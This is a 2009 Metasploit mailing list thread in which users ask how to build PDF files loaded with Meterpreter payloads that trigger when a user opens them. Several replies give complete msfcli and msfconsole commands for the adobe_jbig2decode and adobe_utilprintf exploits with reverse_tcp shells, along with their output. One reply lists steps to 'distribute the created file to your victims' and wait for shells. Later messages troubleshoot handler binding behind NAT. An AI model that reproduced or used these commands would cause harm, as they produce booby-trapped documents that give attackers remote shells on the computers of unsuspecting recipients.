Metasploit mailing list archives
is it possible to attach metasploit payloads
From: abhishek.luck at gmail.com (Abhishek Kumar)
Date: Mon, 30 Mar 2009 05:41:40 +0000
hi list, the suggested methods of injecting payloads in pdf files are application specific (adobe acrobat reader). can we have a generic pdf which is loaded with msf payloads and waiting for the user action ?? abhi On Sun, Mar 29, 2009 at 9:06 PM, <framework-request at spool.metasploit.com> wrote:
Send Framework mailing list submissions to ? ? ? ?framework at spool.metasploit.com To subscribe or unsubscribe via the World Wide Web, visit ? ? ? ?https://mail.metasploit.com/mailman/listinfo/framework or, via email, send a message with subject or body 'help' to ? ? ? ?framework-request at spool.metasploit.com You can reach the person managing the list at ? ? ? ?framework-owner at spool.metasploit.com When replying, please edit your Subject line so it is more specific than "Re: Contents of Framework digest..." Today's Topics: ? 1. Re: is it possible to attach metasploit payloads withpdf ? ? ?(wfdawson at bellsouth.net) ? 2. Re: is it possible to attach metasploit payloads withpdf ? ? ?(Anastasios Monachos) ? 3. Re: is it possible to attach metasploit payloads withpdf (Natron) ? 4. Re: is it possible to attach metasploit payloads withpdf ? ? ?(wfdawson at bellsouth.net) ---------------------------------------------------------------------- Message: 1 Date: Sun, 29 Mar 2009 20:14:05 +0000 From: wfdawson at bellsouth.net Subject: Re: [framework] is it possible to attach metasploit payloads ? ? ? ?withpdf To: framework at spool.metasploit.com Message-ID: ? ? ? ?<032920092014.4078.49CFD68D0004C16300000FEE22243429029B0A02D2089B9A019C04040A0DBF02019C990E0B0099 at att.net> Content-Type: text/plain; charset="us-ascii" ?Hi, I tried your suggestion. ?I have a NAT'ed connection to the Internet where connections to my external address are mapped one-to-one to my internal address. ?With the following: ./msfcli exploit/windows/fileformat/adobe_jbig2decode filename=test2.pdf payload=windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 E ...where x.x.x.x is my actual Internet visible IP address, I obtained the following response: [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [-] Bind failed on 0.0.0.0 [*] Handler binding to LHOST x.x.x.x [-] Bind failed on x.x.x.x [-] Exploit failed: Cannot assign requested address - bind(2) Is there a way to make this work in my situation? ?-------------- Original message from Mirko Iodice <m.iodice at gmail.com>: --------------try: ./msfcli exploit/windows/fileformat/adobe_utilprintf filename=document.pdf payload=windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=5555 E 2009/3/28 Abhishek Kumar :hi list, yesterday i was working around attaching a meterpreter reverse_tcp payload to a MS word document. It was simple to do because msfpayload provides payloads in VBA format. Now,the question is... is there anything available for pdf files ?> can we embed our payloads with pdf and then wait for the user to click on it??regards abhi _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- Mirko Iodice _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090329/24b1cff1/attachment-0001.htm> ------------------------------ Message: 2 Date: Sun, 29 Mar 2009 21:46:03 +0100 From: Anastasios Monachos <anastasiosm at gmail.com> Subject: Re: [framework] is it possible to attach metasploit payloads ? ? ? ?withpdf To: framework at spool.metasploit.com Message-ID: ? ? ? ?<8d90bdd80903291346x47df3beco43a9b6fa5c232449 at mail.gmail.com> Content-Type: text/plain; charset="utf-8" Have tested the following with Adobe Acrobat Reader 9.0.0 tasos at hostnet:~/Programs/framework-3.2$ ./msfcli exploit/windows/fileformat/adobe_jbig2decode FILENAME=jbig2decode.1.102-5555.pdf PAYLOAD=windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=5555 E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Creating 'document102-5555.pdf' file... [*] Generated output file /home/r0b/Programs/framework-3.2/data/exploits/document102-5555.pdf 1. Have ready the multi/handler running with windows/meterpreter/reverse_tcp, with LHOST attacker_ip and LPORT 5555 2. Distribute the created file to your victims 3. and wait for shells to launch ----or---- msf > use ?windows/fileformat/adobe_jbig2decode msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(adobe_jbig2decode) > set LHOST attacker_ip msf exploit(adobe_jbig2decode) > set LPORT 5555 LPORT => 5555 msf exploit(adobe_jbig2decode) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Creating 'msf.pdf' file... [*] Generated output file /home/tasos/Programs/framework-3.2/data/exploits/msf.pdf [*] Exploit completed, but no session was created. now follow 1,2,3 as before Regarding the error received by fdawson at bellsouth.net : .... [-] Bind failed on x.x.x.x [-] Exploit failed: Cannot assign requested address - bind(2) Check if you have enough permissions on your system, also check if the LPORT is already bound. 2009/3/28 Nicolas Krassas <krasn at ans.gr>Trying this one i couldn't really make it to succeed. Anybody has positive results on this ? Dinos ----- Original Message ----- From: "rogue" <wullie19 at ntlworld.com> To: <framework at spool.metasploit.com> Cc: "Abhishek Kumar" <abhishek.luck at gmail.com> Sent: Saturday, March 28, 2009 12:39 PM Subject: Re: [framework] is it possible to attach metasploit payloads withpdf ?Theres also the new oneadobe_jbig2decode.rb. -rogue ?hi list,yesterday i was working around attaching a meterpreter reverse_tcp payload to a MS word document. It was simple to do because msfpayload provides payloads in VBA format. Now,the question is... is there anything available for pdf files ? can we embed our payloads with pdf and then wait for the user to click on it ?? regards abhi _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- AM -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090329/4859ef59/attachment-0001.htm> ------------------------------ Message: 3 Date: Sun, 29 Mar 2009 15:53:25 -0500 From: Natron <natron at invisibledenizen.org> Subject: Re: [framework] is it possible to attach metasploit payloads ? ? ? ?withpdf To: "wfdawson at bellsouth.net" <wfdawson at bellsouth.net> Cc: "framework at spool.metasploit.com" <framework at spool.metasploit.com> Message-ID: ? ? ? ?<D6D4DD46-5F7A-409B-AE38-185C511D0553 at invisibledenizen.com> Content-Type: text/plain; ? ? ? charset=us-ascii; ? ? ? format=flowed; ?delsp=yes Are you running it as root? You can't bind to 443 on a 'normal' account. N On Mar 29, 2009, at 3:14 PM, wfdawson at bellsouth.net wrote:?Hi, I tried your suggestion. ?I have a NAT'ed connection to the Internet where connections to my external address are mapped one-to-one to my internal address. ?With the following: ./msfcli exploit/windows/fileformat/adobe_jbig2decode filename=test2.pdf payload=windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 E ...where x.x.x.x is my actual Internet visible IP address, I obtained the following response: [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [-] Bind failed on 0.0.0.0 [*] Handler binding to LHOST x.x.x.x [-] Bind failed on x.x.x.x [-] Exploit failed: Cannot assign requested address - bind(2) Is there a way to make this work in my situation? -------------- Original message from Mirko Iodice <m.iodice at gmail.com>: --------------try: ./msfcli exploit/windows/fileformat/adobe_utilprintf filename=document.pdf payload=windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=5555 E 2009/3/28 Abhishek Kumar :hi list, yesterday i was working around attaching a meterpreter reverse_tcp payload to a MS word document. It was simple to do because msfpayload provides payloads in VBAformat.Now,the question is... is there anything available for pdf files ? > can we embed ourpayloads with pdf and then wait for the user to click on it??regards abhi _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- Mirko Iodice _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework------------------------------ Message: 4 Date: Sun, 29 Mar 2009 21:05:39 +0000 From: wfdawson at bellsouth.net Subject: Re: [framework] is it possible to attach metasploit payloads ? ? ? ?withpdf To: "framework at spool.metasploit.com" <framework at spool.metasploit.com> Message-ID: ? ? ? ?<032920092105.24920.49CFE2A2000C957F0000615822218865869B0A02D2089B9A019C04040A0DBF02019C990E0B0099 at att.net> Content-Type: text/plain; charset="us-ascii" ?Yes, I am running it as root. ?The "problem" would appear to be that my call to msfcli cannot bind to the x.x.x.x address as that is not my interface's actual address. ?My address is y.y.y.y which is NAT'ed to x.x.x.x. ?I should not care about that from my side. ?The client can certainly connect to x.x.x.x which then is connected to me by NAT... ?-------------- Original message from Natron <natron at invisibledenizen.org>: --------------Are you running it as root? You can't bind to 443 on a 'normal' account. N On Mar 29, 2009, at 3:14 PM, wfdawson at bellsouth.net wrote:?Hi, I tried your suggestion. ?I have a NAT'ed connection to the Internet where connections to my external address are mapped one-to-one to my internal address. ?With the following: ./msfcli exploit/windows/fileformat/adobe_jbig2decode filename=test2.pdf payload=windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 E ...where x.x.x.x is my actual Internet visible IP address, I obtained the following response: [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [-] Bind failed on 0.0.0.0 [*] Handler binding to LHOST x.x.x.x [-] Bind failed on x.x.x.x [-] Exploit failed: Cannot assign requested address - bind(2) Is there a way to make this work in my situation? -------------- Original message from Mirko Iodice : --------------try: ./msfcli exploit/windows/fileformat/adobe_utilprintf filename=document.pdf payload=windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=5555 E 2009/3/28 Abhishek Kumar :hi list, yesterday i was working around attaching a meterpreter reverse_tcp payload to a MS word document. It was simple to do because msfpayload provides payloads in VBAformat.Now,the question is... is there anything available for pdf files ? > can we embed ourpayloads with pdf and then wait for the user to click on it??regards abhi _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- Mirko Iodice _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090329/7d4a7512/attachment.htm> ------------------------------ _______________________________________________ Framework mailing list Framework at spool.metasploit.com https://mail.metasploit.com/mailman/listinfo/framework End of Framework Digest, Vol 14, Issue 35 *****************************************
Current thread:
- is it possible to attach metasploit payloads Abhishek Kumar (Mar 29)
- is it possible to attach metasploit payloads Anastasios Monachos (Mar 30)